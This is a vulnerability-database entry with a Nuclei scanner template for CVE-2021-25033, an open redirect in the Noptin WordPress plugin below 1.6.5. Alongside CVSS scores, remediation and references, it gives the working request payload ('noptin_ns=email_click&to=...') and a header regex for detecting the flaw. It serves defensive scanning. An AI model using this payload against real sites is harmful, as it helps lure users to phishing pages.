Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-25033
HistoryFeb 12, 2022 - 4:53 p.m.

Noptin < 1.6.5 - Open Redirect

2022-02-1216:53:11
ProjectDiscovery
github.com
4

5.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

41.7%

Noptin < 1.6.5 is susceptible to an open redirect vulnerability. The plugin does not validate the “to” parameter before redirecting the user to its given value, leading to an open redirect issue.

id: CVE-2021-25033

info:
  name: Noptin < 1.6.5 - Open Redirect
  author: dhiyaneshDk
  severity: medium
  description: Noptin < 1.6.5 is susceptible to an open redirect vulnerability. The plugin does not validate the "to" parameter before redirecting the user to its given value, leading to an open redirect issue.
  impact: |
    An attacker can trick users into visiting malicious websites, leading to phishing attacks.
  remediation: |
    Update to Noptin plugin version 1.6.5 or later.
  reference:
    - https://wpscan.com/vulnerability/c2d2384c-41b9-4aaf-b918-c1cfda58af5c
    - https://plugins.trac.wordpress.org/changeset/2639592
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25033
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-25033
    cwe-id: CWE-601
    epss-score: 0.001
    epss-percentile: 0.41295
    cpe: cpe:2.3:a:noptin:noptin:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: noptin
    product: noptin
    framework: wordpress
  tags: cve2021,cve,wp,wpscan,wordpress,redirect,wp-plugin,noptin

http:
  - method: GET
    path:
      - "{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 490a004630440220396b879300ee930d2f38493e39073877ff41c4af5abc29c947fa5c14aec64ddd022003e133cc244800f7b286f496f65b5c72e57ea4ca88262b2dd450462dc9551af6:922c64590222798bb761d5b6d8e72950

5.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

41.7%